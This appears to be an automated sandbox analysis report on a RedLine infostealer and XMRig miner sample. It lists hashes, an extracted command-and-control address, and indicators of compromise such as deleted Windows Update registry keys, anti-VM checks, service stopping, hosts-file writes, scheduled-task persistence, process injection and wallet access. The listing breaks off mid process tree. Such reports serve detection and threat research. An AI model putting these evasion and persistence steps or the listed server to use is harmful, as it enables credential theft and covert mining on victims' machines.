redline | 5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c

Resubmissions

18-10-2022 00:37

221018-aytntseafn 10

17-10-2022 22:32

221017-2f2p9sdfgl 10

Analysis

max time kernel
300s
max time network
291s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
17-10-2022 22:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe
Size

345KB
MD5

f1d121ab68b439ac310fb79119ffb044
SHA1

f952140c206d96843baa79f2e0e8454c07fa683a
SHA256

5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c
SHA512

ca0a381a392f9ac1c2954042759955b50e6c1fa735609ac69710658e51c48191f0d99469847b3ebf3f40ce854cb0595387ad986aeacbb5ebd8d05666746e6d6d
SSDEEP

6144:GK5lpVV+1MszHze0x/qgMyy4oh5VyrsyaO6enVX9Pv71L8Er8:Hv1YzeDyy4osa6ljQE

Score

10^/10

redline xmrig 875784825 evasion infostealer miner spyware themida trojan upx

Malware Config

Extracted

Family

redline

Botnet

875784825

79.137.192.6:8362

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/99276-416-0x000000000041972E-mapping.dmp	family_redline
behavioral2/memory/99276-452-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

updater.exeMoUSO.exesetup.exesetup23.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MoUSO.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup23.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/6264-952-0x00007FF7D6320000-0x00007FF7D6B14000-memory.dmp	xmrig
behavioral2/memory/6264-1218-0x00007FF7D6320000-0x00007FF7D6B14000-memory.dmp	xmrig

Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

setup.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts setup.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 5 IoCs

Processes:

setup.exesetup23.exeupdater.exeMoUSO.exewatchdog.exe

pid process

3696 setup.exe
4796 setup23.exe
3920 updater.exe
1796 MoUSO.exe
3492 watchdog.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	setup.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

pid	process
3696	setup.exe
4796	setup23.exe
3920	updater.exe
1796	MoUSO.exe
3492	watchdog.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/6264-952-0x00007FF7D6320000-0x00007FF7D6B14000-memory.dmp	upx
behavioral2/memory/6264-1218-0x00007FF7D6320000-0x00007FF7D6B14000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MoUSO.exesetup.exesetup23.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup23.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup23.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MoUSO.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup23.exeMoUSO.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Wine	setup23.exe
Key opened	\REGISTRY\USER\S-1-5-21-3844063266-715245855-4050956231-1000\Software\Wine	MoUSO.exe

Themida packer 16 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\setup.exe	themida
behavioral2/memory/3696-126-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
behavioral2/memory/3696-127-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
behavioral2/memory/3696-128-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
behavioral2/memory/3696-129-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
behavioral2/memory/3696-130-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
behavioral2/memory/3696-131-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
behavioral2/memory/3696-132-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
behavioral2/memory/3696-134-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\setup.exe	themida
behavioral2/memory/3696-315-0x00007FF6548B0000-0x00007FF6555A9000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/3920-345-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmp	themida
behavioral2/memory/3920-497-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/3920-950-0x00007FF6C0A60000-0x00007FF6C1759000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

updater.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exesetup23.exeupdater.exeMoUSO.exe

pid process

3696 setup.exe
4796 setup23.exe
3920 updater.exe
1796 MoUSO.exe

pid	process
3696	setup.exe
4796	setup23.exe
3920	updater.exe
1796	MoUSO.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exewatchdog.exeupdater.exe

description	pid	process	target process
PID 3528 set thread context of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3492 set thread context of 99276	3492	watchdog.exe	vbc.exe
PID 3920 set thread context of 6108	3920	updater.exe	conhost.exe
PID 3920 set thread context of 6264	3920	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

setup.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

4412 sc.exe
4604 sc.exe
920 sc.exe
420 sc.exe
1936 sc.exe
2632 sc.exe
4752 sc.exe
2148 sc.exe
5112 sc.exe
3500 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1596 schtasks.exe

pid	process
4412	sc.exe
4604	sc.exe
920	sc.exe
420	sc.exe
1936	sc.exe
2632	sc.exe
4752	sc.exe
2148	sc.exe
5112	sc.exe
3500	sc.exe

pid	process
1596	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exesetup23.exepowershell.exepowershell.exeMoUSO.exe

pid	process
4828	powershell.exe
4828	powershell.exe
4828	powershell.exe
4796	setup23.exe
4796	setup23.exe
2640	powershell.exe
2640	powershell.exe
2640	powershell.exe
756	powershell.exe
756	powershell.exe
756	powershell.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe
1796	MoUSO.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

616

pid	process
616

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeIncreaseQuotaPrivilege	4828	powershell.exe
Token: SeSecurityPrivilege	4828	powershell.exe
Token: SeTakeOwnershipPrivilege	4828	powershell.exe
Token: SeLoadDriverPrivilege	4828	powershell.exe
Token: SeSystemProfilePrivilege	4828	powershell.exe
Token: SeSystemtimePrivilege	4828	powershell.exe
Token: SeProfSingleProcessPrivilege	4828	powershell.exe
Token: SeIncBasePriorityPrivilege	4828	powershell.exe
Token: SeCreatePagefilePrivilege	4828	powershell.exe
Token: SeBackupPrivilege	4828	powershell.exe
Token: SeRestorePrivilege	4828	powershell.exe
Token: SeShutdownPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeSystemEnvironmentPrivilege	4828	powershell.exe
Token: SeRemoteShutdownPrivilege	4828	powershell.exe
Token: SeUndockPrivilege	4828	powershell.exe
Token: SeManageVolumePrivilege	4828	powershell.exe
Token: 33	4828	powershell.exe
Token: 34	4828	powershell.exe
Token: 35	4828	powershell.exe
Token: 36	4828	powershell.exe
Token: SeShutdownPrivilege	5096	powercfg.exe
Token: SeCreatePagefilePrivilege	5096	powercfg.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeShutdownPrivilege	4396	powercfg.exe
Token: SeCreatePagefilePrivilege	4396	powercfg.exe
Token: SeShutdownPrivilege	4500	powercfg.exe
Token: SeCreatePagefilePrivilege	4500	powercfg.exe
Token: SeShutdownPrivilege	4568	powercfg.exe
Token: SeCreatePagefilePrivilege	4568	powercfg.exe
Token: SeIncreaseQuotaPrivilege	2640	powershell.exe
Token: SeSecurityPrivilege	2640	powershell.exe
Token: SeTakeOwnershipPrivilege	2640	powershell.exe
Token: SeLoadDriverPrivilege	2640	powershell.exe
Token: SeSystemProfilePrivilege	2640	powershell.exe
Token: SeSystemtimePrivilege	2640	powershell.exe
Token: SeProfSingleProcessPrivilege	2640	powershell.exe
Token: SeIncBasePriorityPrivilege	2640	powershell.exe
Token: SeCreatePagefilePrivilege	2640	powershell.exe
Token: SeBackupPrivilege	2640	powershell.exe
Token: SeRestorePrivilege	2640	powershell.exe
Token: SeShutdownPrivilege	2640	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe
Token: SeSystemEnvironmentPrivilege	2640	powershell.exe
Token: SeRemoteShutdownPrivilege	2640	powershell.exe
Token: SeUndockPrivilege	2640	powershell.exe
Token: SeManageVolumePrivilege	2640	powershell.exe
Token: 33	2640	powershell.exe
Token: 34	2640	powershell.exe
Token: 35	2640	powershell.exe
Token: 36	2640	powershell.exe
Token: SeIncreaseQuotaPrivilege	2640	powershell.exe
Token: SeSecurityPrivilege	2640	powershell.exe
Token: SeTakeOwnershipPrivilege	2640	powershell.exe
Token: SeLoadDriverPrivilege	2640	powershell.exe
Token: SeSystemProfilePrivilege	2640	powershell.exe
Token: SeSystemtimePrivilege	2640	powershell.exe
Token: SeProfSingleProcessPrivilege	2640	powershell.exe
Token: SeIncBasePriorityPrivilege	2640	powershell.exe
Token: SeCreatePagefilePrivilege	2640	powershell.exe
Token: SeBackupPrivilege	2640	powershell.exe
Token: SeRestorePrivilege	2640	powershell.exe
Token: SeShutdownPrivilege	2640	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exeRegSvcs.exesetup.execmd.execmd.exesetup23.exepowershell.exewatchdog.exe

description	pid	process	target process
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3528 wrote to memory of 3832	3528	5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe	RegSvcs.exe
PID 3832 wrote to memory of 3696	3832	RegSvcs.exe	setup.exe
PID 3832 wrote to memory of 3696	3832	RegSvcs.exe	setup.exe
PID 3832 wrote to memory of 4796	3832	RegSvcs.exe	setup23.exe
PID 3832 wrote to memory of 4796	3832	RegSvcs.exe	setup23.exe
PID 3832 wrote to memory of 4796	3832	RegSvcs.exe	setup23.exe
PID 3696 wrote to memory of 4828	3696	setup.exe	powershell.exe
PID 3696 wrote to memory of 4828	3696	setup.exe	powershell.exe
PID 3696 wrote to memory of 2264	3696	setup.exe	cmd.exe
PID 3696 wrote to memory of 2264	3696	setup.exe	cmd.exe
PID 3696 wrote to memory of 4960	3696	setup.exe	cmd.exe
PID 3696 wrote to memory of 4960	3696	setup.exe	cmd.exe
PID 3696 wrote to memory of 2640	3696	setup.exe	powershell.exe
PID 3696 wrote to memory of 2640	3696	setup.exe	powershell.exe
PID 2264 wrote to memory of 1936	2264	cmd.exe	sc.exe
PID 2264 wrote to memory of 1936	2264	cmd.exe	sc.exe
PID 4960 wrote to memory of 5096	4960	cmd.exe	powercfg.exe
PID 4960 wrote to memory of 5096	4960	cmd.exe	powercfg.exe
PID 2264 wrote to memory of 4412	2264	cmd.exe	sc.exe
PID 2264 wrote to memory of 4412	2264	cmd.exe	sc.exe
PID 4960 wrote to memory of 4396	4960	cmd.exe	powercfg.exe
PID 4960 wrote to memory of 4396	4960	cmd.exe	powercfg.exe
PID 2264 wrote to memory of 4604	2264	cmd.exe	sc.exe
PID 2264 wrote to memory of 4604	2264	cmd.exe	sc.exe
PID 4960 wrote to memory of 4500	4960	cmd.exe	powercfg.exe
PID 4960 wrote to memory of 4500	4960	cmd.exe	powercfg.exe
PID 4960 wrote to memory of 4568	4960	cmd.exe	powercfg.exe
PID 4960 wrote to memory of 4568	4960	cmd.exe	powercfg.exe
PID 2264 wrote to memory of 920	2264	cmd.exe	sc.exe
PID 2264 wrote to memory of 920	2264	cmd.exe	sc.exe
PID 2264 wrote to memory of 420	2264	cmd.exe	sc.exe
PID 2264 wrote to memory of 420	2264	cmd.exe	sc.exe
PID 2264 wrote to memory of 3152	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 3152	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 1848	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 1848	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 1116	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 1116	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 1356	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 1356	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 1228	2264	cmd.exe	reg.exe
PID 2264 wrote to memory of 1228	2264	cmd.exe	reg.exe
PID 4796 wrote to memory of 1596	4796	setup23.exe	schtasks.exe
PID 4796 wrote to memory of 1596	4796	setup23.exe	schtasks.exe
PID 4796 wrote to memory of 1596	4796	setup23.exe	schtasks.exe
PID 3696 wrote to memory of 756	3696	setup.exe	powershell.exe
PID 3696 wrote to memory of 756	3696	setup.exe	powershell.exe
PID 756 wrote to memory of 3772	756	powershell.exe	schtasks.exe
PID 756 wrote to memory of 3772	756	powershell.exe	schtasks.exe
PID 3832 wrote to memory of 3492	3832	RegSvcs.exe	watchdog.exe
PID 3832 wrote to memory of 3492	3832	RegSvcs.exe	watchdog.exe
PID 3832 wrote to memory of 3492	3832	RegSvcs.exe	watchdog.exe
PID 3492 wrote to memory of 99276	3492	watchdog.exe	vbc.exe
PID 3492 wrote to memory of 99276	3492	watchdog.exe	vbc.exe

C:\Users\Admin\AppData\Local\Temp\5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe
"C:\Users\Admin\AppData\Local\Temp\5f52f4c26c16eceec69e49f93133b4fea3598f840ce5d8065d668dd99f47583c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3528
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3832
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Checks BIOS information in registry
